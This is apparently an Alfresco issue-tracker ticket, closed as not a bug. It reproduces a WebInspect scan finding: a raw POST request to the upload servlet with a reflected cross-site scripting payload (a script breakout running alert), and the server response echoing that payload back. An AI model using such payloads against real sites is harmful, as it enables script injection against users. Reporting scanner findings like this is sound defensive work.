Details

    • Type: Bug
    • Status: Closed
    • Resolution: Not a bug
    • Affects Version/s: 3.4
    • Fix Version/s: 3.4.5
    • Component/s: Installer
    • Labels:
      None
    • Bug Priority:
      Category 1

      Description

      Following has been detected by webinspect

      Attack Request: POST /alfresco/uploadFileServlet HTTP/1.1
      Accept: /
      Referer: http://xx:8090/alfresco/faces/jsp/browse/browse.jsp
      Accept-Language: en-us
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
      Content-Type: multipart/form-data; boundary=---------------------------7db29b182e0418
      Accept-Encoding: gzip, deflate
      Host: 172.17.178.144:8090
      Content-Length: 13106
      Pragma: no-cache
      Connection: Keep-Alive
      Cookie:
      JSESSIONID=74D624BC200301B1C875E92E94F62483;CustomCookie=WebInspect69878ZXBE464EB52
      2584864BD7EDE7A3DAE5C10Y4ADD
      ...TRUNCATED...:window.parent.upload_complete_helper(''</sCrIpT><
      sCrIpT>alert(78782)</sCrIpT>,{error: '${_UPLOAD_ERROR}', fileTypeImage: '${_FILE_TYPE_IM
      AGE}'})
      -----------------------------7db29b182e04...TRUNCATED...
      Attack Response:
      HTTP/1.1 200 OK
      6
      Vulnerability (Classic) Report Date: 8/4/2011
      Attack Response: HTTP/1.1 200 OK
      Server: Apache-Coyote/1.1
      X-XSS-Protection: 0
      Content-Type: text/html;charset=utf-8
      Content-Length: 216
      Date: Thu, 04 Aug 2011 11:51:28 GMT
      Connection: close
      ...TRUNCATED...ascript">
      window.parent.upload_complete_helper(''</sCrIpT><sCrIpT>alert(78782)</sCrIpT>,{error:
      '${_UPLOAD_ERROR}', fileTypeImage: '${_FI...TRUNCATED...
      File Names: http://xx:8090/alfresco/uploadFileServlet
      http://xx.xx.xx.xx8090/alfresco/uploadFileServlet
      http://xx.xx.xx.xx:8090/alfresco/uploadFileServlet

        Attachments

          Structure

            Activity

              People

              • Assignee:
                closedissues Closed Issues
                Reporter:
                cms cms (Inactive)
              • Votes:
                0 Vote for this issue
                Watchers:
                0 Start watching this issue

                Dates

                • Created:
                  Updated:
                  Resolved:

                  Structure Helper Panel